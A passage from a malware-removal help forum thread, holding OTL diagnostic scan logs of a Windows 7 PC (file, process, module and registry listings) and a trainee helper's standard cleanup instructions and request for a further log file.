[2014/12/06 10:12:07 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{2EFEAD60-4A39-41D8-9D9E-DABFDD178FE2}
[2014/12/05 21:22:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{19426403-8E37-45F2-9B32-7BD5D9196B91}
[2014/12/05 08:54:16 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{4F264C4A-BC66-4EE5-9729-FEBC94940DAE}
[2014/12/04 08:38:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{A64B1B77-F70B-4F72-889C-EECA456A2A53}
[2014/12/03 09:10:30 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BD50A9B9-794F-415E-B22B-E8A226C2566B}
[2014/12/02 19:59:08 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{58E20622-838A-4DF6-87FF-633A4762CED0}
[2014/12/02 07:58:40 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E63427D4-2D93-4ECF-A293-EA717FEC94B9}
[2014/12/01 07:27:06 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{14077749-0317-4E61-9A41-5B38A6CB89AF}
[2014/12/01 00:27:11 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{9919C10E-8A71-45EC-ACBA-EFF36D84CB71}
[2014/11/30 22:15:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{93B92312-0CD7-4DD0-B3E3-5E9EBF0FFAB5}
[2014/11/30 16:29:21 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{9F484F36-6982-41DF-B3F5-3F7F29871782}
[2014/11/29 22:40:44 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{730054E7-1B19-4831-93B1-130BAADA1170}
[2014/11/29 09:30:29 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{92C091D9-97B4-40EA-8CE6-53788471D9F8}
[2014/11/28 15:49:12 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D4C697C7-A168-49A1-BACA-7A35453589CA}
[2014/11/28 03:48:43 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{3BF2C825-1CD2-4217-B154-ADFB27720D18}
[2014/11/27 13:19:15 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{72283AC5-4FD6-4FCF-ACA7-0F1434D31AA3}
[2014/11/26 19:57:06 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F06BE51C-24FB-48F9-BA43-A1DD75C7DFDE}
[2014/11/26 18:13:45 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8C17B09D-3B72-4713-A05F-47A292E98DDB}
[2014/11/26 06:08:57 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{1096C07C-5A4A-4DE5-B6DB-0B2E9D6FB231}
 
========== Files - Modified Within 30 Days ==========
 
[2029/07/17 16:13:42 | 000,695,103 | ---- | M] () -- C:\Users\BR\Documents\IMG_0057.JPG
[2029/07/17 16:13:42 | 000,695,103 | ---- | M] () -- C:\Users\BR\Documents\IMG_0057(0).JPG
[2014/12/25 20:39:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/12/25 20:37:00 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/12/25 00:37:00 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/12/24 17:58:21 | 000,008,192 | ---- | M] () -- C:\Windows\SysWow64\WDPABKP.dat
[2014/12/24 17:50:13 | 000,015,792 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/12/24 17:50:13 | 000,015,792 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/12/24 17:45:50 | 000,786,622 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/12/24 17:45:50 | 000,669,578 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/12/24 17:45:50 | 000,127,194 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/12/24 17:38:56 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/12/24 17:38:23 | 1314,791,423 | -HS- | M] () -- C:\hiberfil.sys
[2014/12/24 16:54:21 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/12/24 16:14:16 | 000,002,679 | ---- | M] () -- C:\Windows\patsearch.bin
[2014/12/24 16:14:05 | 000,000,000 | -H-- | M] () -- C:\Windows\SysNative\drivers\Msft_Kernel_webinstrNewH_01009.Wdf
[2014/12/24 16:13:49 | 000,001,897 | ---- | M] () -- C:\Users\Public\Desktop\HitsBlender.lnk
[2014/12/23 09:42:11 | 000,228,630 | ---- | M] () -- C:\Users\BR\Documents\Shane parts cost.pdf
[2014/12/15 08:33:06 | 000,001,064 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014/12/14 12:08:51 | 000,002,202 | ---- | M] () -- C:\Users\Public\Desktop\HP Officejet Pro 8620.lnk
[2014/12/14 12:08:51 | 000,001,154 | ---- | M] () -- C:\Users\Public\Desktop\Shop for Supplies - HP Officejet Pro 8620.lnk
[2014/12/14 11:15:17 | 000,001,966 | ---- | M] () -- C:\Users\Public\Desktop\HP Print and Scan Doctor.lnk
[2014/12/14 11:13:53 | 000,000,323 | ---- | M] () -- C:\Users\BR\Desktop\HP Printer Diagnostic Tools.url
[2014/12/12 18:47:18 | 000,001,259 | ---- | M] () -- C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
 
========== Files Created - No Company Name ==========
 
[2014/12/24 17:50:25 | 000,008,192 | ---- | C] () -- C:\Windows\SysWow64\WDPABKP.dat
[2014/12/24 16:14:16 | 000,002,679 | ---- | C] () -- C:\Windows\patsearch.bin
[2014/12/24 16:14:05 | 000,000,000 | -H-- | C] () -- C:\Windows\SysNative\drivers\Msft_Kernel_webinstrNewH_01009.Wdf
[2014/12/24 16:13:49 | 000,001,897 | ---- | C] () -- C:\Users\Public\Desktop\HitsBlender.lnk
[2014/12/23 09:42:10 | 000,228,630 | ---- | C] () -- C:\Users\BR\Documents\Shane parts cost.pdf
[2014/12/14 12:08:51 | 000,002,202 | ---- | C] () -- C:\Users\Public\Desktop\HP Officejet Pro 8620.lnk
[2014/12/14 12:08:51 | 000,001,154 | ---- | C] () -- C:\Users\Public\Desktop\Shop for Supplies - HP Officejet Pro 8620.lnk
[2014/12/14 11:13:53 | 000,000,323 | ---- | C] () -- C:\Users\BR\Desktop\HP Printer Diagnostic Tools.url
[2014/12/12 18:47:18 | 000,001,271 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
[2014/12/12 18:47:18 | 000,001,259 | ---- | C] () -- C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
[2014/11/11 10:57:01 | 000,000,044 | ---- | C] () -- C:\Users\BR\AppData\Roaming\WB.CFG
[2014/10/27 09:02:06 | 000,009,728 | ---- | C] () -- C:\Users\BR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2014/09/09 15:27:00 | 000,000,000 | ---- | C] () -- C:\Users\BR\AppData\Roaming\bibstats
[2014/09/09 10:57:55 | 000,005,021 | ---- | C] () -- C:\Users\BR\AppData\Local\recently-used.xbel
[2014/09/04 10:40:58 | 000,000,057 | ---- | C] () -- C:\ProgramData\Ament.ini
[2014/07/22 14:02:04 | 000,202,546 | ---- | C] () -- C:\Windows\hpoins18.dat.temp
[2014/07/22 14:02:04 | 000,005,355 | ---- | C] () -- C:\Windows\hpomdl18.dat.temp
[2014/01/25 06:26:34 | 000,000,207 | ---- | C] () -- C:\Windows\tweaking.com-regbackup-BRIAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
[2013/10/15 05:55:16 | 000,165,376 | ---- | C] () -- C:\Windows\SysWow64\unrar.dll
[2013/08/06 16:23:26 | 000,000,258 | RHS- | C] () -- C:\Users\BR\ntuser.pol
[2012/12/02 12:08:02 | 000,000,105 | ---- | C] () -- C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
[2012/10/03 17:23:13 | 000,049,261 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD6.1
[2012/10/03 17:23:12 | 000,136,857 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD6.0
[2012/10/03 17:23:12 | 000,049,486 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD6.JPG
[2012/10/03 17:22:42 | 000,050,685 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD5.1
[2012/10/03 17:22:40 | 000,135,858 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD5.0
[2012/10/03 17:22:40 | 000,050,520 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD5.JPG
[2012/10/03 17:22:18 | 000,134,269 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD4.0
[2012/10/03 17:22:18 | 000,049,466 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD4.JPG
[2012/10/03 17:21:55 | 000,115,714 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD3.0
[2012/10/03 17:21:55 | 000,038,427 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD3.JPG
[2012/10/03 17:21:35 | 000,121,078 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD1.0
[2012/10/03 17:21:35 | 000,044,248 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD1.JPG
[2012/10/03 17:18:39 | 000,112,551 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD2.0
[2012/10/03 17:18:39 | 000,040,181 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD2.JPG
[2012/09/23 13:15:55 | 000,132,533 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpFM3 #2 001.JPG
[2012/09/23 13:15:52 | 000,132,486 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpFM3 #2 001.1
[2012/09/23 13:15:39 | 000,003,890 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpFM3 #2 001_navi.JPG
[2012/09/23 13:15:33 | 000,137,289 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpFM3 #2 001.0
[2012/08/22 15:05:20 | 000,006,400 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpUNTITLED LOGO XX2_THUMBNAIL(0).0
[2012/08/22 15:05:20 | 000,001,969 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpUNTITLED LOGO XX2_THUMBNAIL(0).JPG
[2012/06/07 20:09:05 | 000,000,000 | ---- | C] () -- C:\Users\BR\AppData\Local\Temptable.xml
[2012/06/07 13:40:49 | 000,016,016 | ---- | C] () -- C:\Users\BR\carbon_steel.jpg
[2012/03/14 08:36:24 | 000,682,208 | ---- | C] () -- C:\Users\BR\P9010008(0).JPG
[2012/03/14 08:36:24 | 000,670,313 | ---- | C] () -- C:\Users\BR\P9010021(0).JPG
[2012/03/13 17:47:41 | 000,000,173 | ---- | C] () -- C:\ProgramData\LockFilePath.ini
[2012/03/13 04:27:04 | 000,682,208 | ---- | C] () -- C:\Users\BR\P9010008.JPG
[2012/03/13 04:27:04 | 000,670,313 | ---- | C] () -- C:\Users\BR\P9010021.JPG
 
========== ZeroAccess Check ==========
 
[2009/07/13 20:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 18:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 17:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 17:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 04:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 17:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2013/10/05 04:38:00 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Alibaba
[2012/12/15 12:38:55 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\AnvSoft
[2013/08/27 17:43:52 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Autodesk
[2014/09/08 12:58:09 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Awesome Duplicate Photo Finder
[2014/09/08 16:30:27 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\BitTorrent
[2012/08/20 18:16:29 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Canneverbe Limited
[2014/09/04 09:57:06 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\com.adobe.downloadassistant.AdobeDownloadAssistant
[2012/06/07 13:07:43 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\DassaultSystemes
[2012/06/07 13:07:43 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\EDrawings
[2014/11/13 09:09:56 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\FirefoxToolbar
[2014/09/04 16:27:52 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Foxit Software
[2013/08/31 10:05:33 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Free-PDF-to-Word.com
[2014/11/24 16:40:54 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\FreeBurner
[2012/11/14 07:42:35 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\funkitron
[2013/08/21 07:46:03 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\KeePass
[2014/11/23 10:18:41 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\No Company Name
[2014/09/11 06:59:07 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Oberon Media
[2013/08/31 09:40:33 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\OpenOffice
[2014/09/04 11:21:22 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\PDAppFlex
[2012/12/02 12:09:02 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Photobucket
[2013/09/08 00:52:10 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\PlayFirst
[2014/11/24 16:53:27 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\PowerISO
[2014/11/13 17:51:47 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\RHEng
[2014/11/13 17:51:38 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\rmi
[2013/09/19 14:07:58 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\SmartDraw
[2012/04/18 22:06:38 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\TeamViewer
[2012/09/13 07:52:41 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\TightVNC
[2013/09/02 09:52:38 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\WildTangent
[2012/04/02 07:58:49 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Windows Live Writer
 
========== Purity Check ==========
 
 
 
========== Files - Unicode (All) ==========
[2012/03/14 08:44:01 | 001,133,304 | ---- | C] ()(C:\Users\BR\Documents\??0014(0).JPG) -- C:\Users\BR\Documents\扫描0014(0).JPG
[2012/03/14 08:43:54 | 000,019,267 | ---- | C] ()(C:\Users\BR\Documents\SYC86 ?? internal fan(0).pdf) -- C:\Users\BR\Documents\SYC86 馬達 internal fan(0).pdf
[2012/03/13 04:33:01 | 001,133,304 | ---- | C] ()(C:\Users\BR\Documents\??0014.JPG) -- C:\Users\BR\Documents\扫描0014.JPG
[2012/03/13 04:32:55 | 000,019,267 | ---- | C] ()(C:\Users\BR\Documents\SYC86 ?? internal fan.pdf) -- C:\Users\BR\Documents\SYC86 馬達 internal fan.pdf
[2009/05/27 17:49:52 | 001,133,304 | ---- | M] ()(C:\Users\BR\Documents\??0014.JPG) -- C:\Users\BR\Documents\扫描0014.JPG
[2009/05/27 17:49:52 | 001,133,304 | ---- | M] ()(C:\Users\BR\Documents\??0014(0).JPG) -- C:\Users\BR\Documents\扫描0014(0).JPG
[2009/04/15 21:15:20 | 000,019,267 | ---- | M] ()(C:\Users\BR\Documents\SYC86 ?? internal fan.pdf) -- C:\Users\BR\Documents\SYC86 馬達 internal fan.pdf
[2009/04/15 21:15:20 | 000,019,267 | ---- | M] ()(C:\Users\BR\Documents\SYC86 ?? internal fan(0).pdf) -- C:\Users\BR\Documents\SYC86 馬達 internal fan(0).pdf
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 917 bytes -> C:\Users\BR\Documents\Re_ 1965 Chevrolet Corvette on UsedCorvettesOnline.com.eml:OECustomProperty
@Alternate Data Stream - 917 bytes -> C:\Users\BR\Documents\Re_ 1965 Chevrolet Corvette on UsedCorvettesOnline.com(0).eml:OECustomProperty
@Alternate Data Stream - 829 bytes -> C:\Users\BR\Documents\Aluminum Fabricated Tables.eml:OECustomProperty
@Alternate Data Stream - 781 bytes -> C:\Users\BR\Documents\P.O. For tumble weed.eml:OECustomProperty
@Alternate Data Stream - 781 bytes -> C:\Users\BR\Documents\P.O. For tumble weed(0).eml:OECustomProperty
@Alternate Data Stream - 613 bytes -> C:\Users\BR\Documents\reaper pic sept.eml:OECustomProperty
@Alternate Data Stream - 613 bytes -> C:\Users\BR\Documents\reaper pic sept(0).eml:OECustomProperty
@Alternate Data Stream - 357 bytes -> C:\ProgramData\Temp:7A8EE542

< End of report >
 


  • 0

Advertisements


#2
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Hi. My name is Brian, and I would be happy to look into your issue.
 
I am currently in training and my posts will need to be reviewed by an expert, so expect a slight delay between posts.



- General Instructions -

  • Please read all instructions and fixes thoroughly. Read the ENTIRE post BEFORE performing any steps so you understand all that needs to be done.
  • I would advise printing any instructions for easy reference as some of the fixes may require you to boot in Safe mode. Access to these instructions may not be available in Safe Mode.
  • Any fixes provided by myself are for this log file only and should not be used on any other systems.
  • Do not run any other removal software or perform updates other than the ones I provide, as it will complicate the cleaning process.
  • It's very likely that part of our cleanup will include emptying your recycle bin. If you use your recycle bin as an archive and do not wish this to be emptied, please let me know.
  • You have 4 days to reply to each post or the topic will be closed. You will be able to request that the topic be re-opened by sending me a PM (Personal Message) or PM a moderator.
  • Please feel free to ask any questions, especially if you are having problems with my instructions.


- Save ALL Tools to your Desktop-

 

All tools that I have you download should be placed on the desktop unless otherwise stated. If you are familiar with how to save files to the desktop then you can skip this step.
 
Since you are continuing with this step then I assume you are unfamiliar with saving files to your desktop. As a result it's easiest if you configure your browser(s) to download any tools to the desktop by default. Please use the appropriate instructions below depending on the browser you are using.
Chrome.JPGGoogle Chrome - Click the "Customize and control Google Chrome" button in the upper right-corner of the browser.Settings.JPG Choose Settings. at the bottom of the screen click the
"Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.
Firefox.JPGMozilla Firefox - Click the "Open Menu" button in the upper right-corner of the browser. Settings.JPG Choose Options. In the downloads section, click the Browse button, click on the Desktop folder
and the click the "Select Folder" button. Click OK to get out of the Options menu.
IE.jpgInternet Explorer - Click the Tools menu in the upper right-corner of the browser. Tools.JPG Select View downloads. Select the Options link in the lower left of the window. Click Browse and
select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.
 

- Finally Before We Start-

 
Removing malware is a complicated multiple step process, Please stay with me until I have declared your system clean. I strongly recommend you backup your personal files and folders. Although rare, attempting to remove malware can render your machine unbootable or cause data loss. Having backups of your data is your responsibility. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.

 

 

 

 

I'm reviewing your log now. There should also be an Extras.txt file in your Downloads folder. If you could post the contents of that it would be appreciated. Thank you.


  • 0

#3
RUSTY2

RUSTY2

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 221 posts

Hi. My name is Brian, and I would be happy to look into your issue.
 
I am currently in training and my posts will need to be reviewed by an expert, so expect a slight delay between posts.


OTL logfile created on: 30/12/2014 10:30:23 AM - Run 9
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\BR\Downloads
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00001009 | Country: Canada | Language: ENC | Date Format: dd/MM/yyyy
 
6.97 Gb Total Physical Memory | 3.57 Gb Available Physical Memory | 51.19% Memory free
13.93 Gb Paging File | 11.10 Gb Available in Paging File | 79.68% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 920.39 Gb Total Space | 752.33 Gb Free Space | 81.74% Space Free | Partition Type: NTFS
Drive D: | 11.02 Gb Total Space | 1.59 Gb Free Space | 14.44% Space Free | Partition Type: NTFS
Drive F: | 7.45 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: UDF
Drive K: | 2794.49 Gb Total Space | 2794.03 Gb Free Space | 99.98% Space Free | Partition Type: NTFS
 
Computer Name: BRIAN-PC | User Name: BR | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/12/24 16:13:48 | 000,678,968 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\hitsblender.exe
PRC - [2014/12/19 08:48:18 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/12/11 11:36:04 | 000,089,864 | ---- | M] (Hewlett-Packard Company) -- C:\Program Files (x86)\hp\Common\HPSupportSolutionsFrameworkService.exe
PRC - [2014/12/09 09:15:02 | 000,337,520 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2014/10/29 23:25:46 | 004,673,432 | ---- | M] (Akamai Technologies, Inc.) -- C:\Users\BR\AppData\Local\Akamai\netsession_win.exe
PRC - [2014/10/20 17:52:12 | 000,043,816 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe
PRC - [2014/10/17 15:24:20 | 000,043,816 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
PRC - [2014/10/17 15:24:04 | 000,043,816 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
PRC - [2014/10/11 13:05:40 | 000,060,712 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
PRC - [2014/10/01 02:17:20 | 002,694,320 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
PRC - [2014/09/28 20:56:44 | 000,490,160 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
PRC - [2014/09/26 14:40:46 | 006,237,856 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
PRC - [2014/09/19 20:16:28 | 001,038,504 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
PRC - [2014/09/10 12:37:16 | 000,769,696 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
PRC - [2014/08/26 17:50:56 | 002,087,776 | ---- | M] (Wondershare) -- C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
PRC - [2014/07/22 14:25:38 | 001,042,808 | R--- | M] (Western Digital Technologies, Inc.) -- C:\Program Files (x86)\Western Digital\WD SmartWare\WDBackupEngine.exe
PRC - [2014/07/22 14:15:46 | 005,562,736 | R--- | M] (Western Digital Technologies, Inc.) -- C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe
PRC - [2014/05/23 11:09:00 | 000,296,312 | R--- | M] (Western Digital Technologies, Inc.) -- C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe
PRC - [2014/05/23 11:06:20 | 001,852,264 | R--- | M] (Western Digital Technologies, Inc.) -- C:\Program Files (x86)\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe
PRC - [2014/05/03 08:33:19 | 001,864,368 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_206.exe
PRC - [2014/01/23 21:05:53 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\BR\Downloads\OTL(2).exe
PRC - [2013/09/25 05:37:14 | 000,181,152 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Elements 12 Organizer\PhotoshopElementsFileAgent.exe
PRC - [2013/06/18 21:21:20 | 001,694,080 | R--- | M] (Western Digital Technologies, Inc.) -- C:\Program Files (x86)\Western Digital\WD Security\WDDriveAutoUnlock.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/12/24 16:13:49 | 000,874,496 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\platforms\qwindows.dll
MOD - [2014/12/24 16:13:48 | 000,725,504 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\libGLESv2.dll
MOD - [2014/12/24 16:13:48 | 000,678,968 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\hitsblender.exe
MOD - [2014/12/24 16:13:48 | 000,241,152 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\imageformats\qjpeg.dll
MOD - [2014/12/24 16:13:48 | 000,220,672 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\imageformats\qmng.dll
MOD - [2014/12/24 16:13:48 | 000,143,872 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\libmpg123.dll
MOD - [2014/12/24 16:13:48 | 000,042,496 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\libEGL.dll
MOD - [2014/12/24 16:13:48 | 000,023,552 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\imageformats\qico.dll
MOD - [2014/12/24 16:13:48 | 000,023,552 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\imageformats\qgif.dll
MOD - [2014/12/09 09:15:00 | 003,758,192 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2014/10/16 02:19:23 | 007,668,736 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7147fa233a070283dba824da40089bf1\System.Xml.ni.dll
MOD - [2014/10/16 02:19:22 | 002,822,144 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\f9f13cd8fe1cefaad78579a7c3a41464\System.Runtime.Serialization.ni.dll
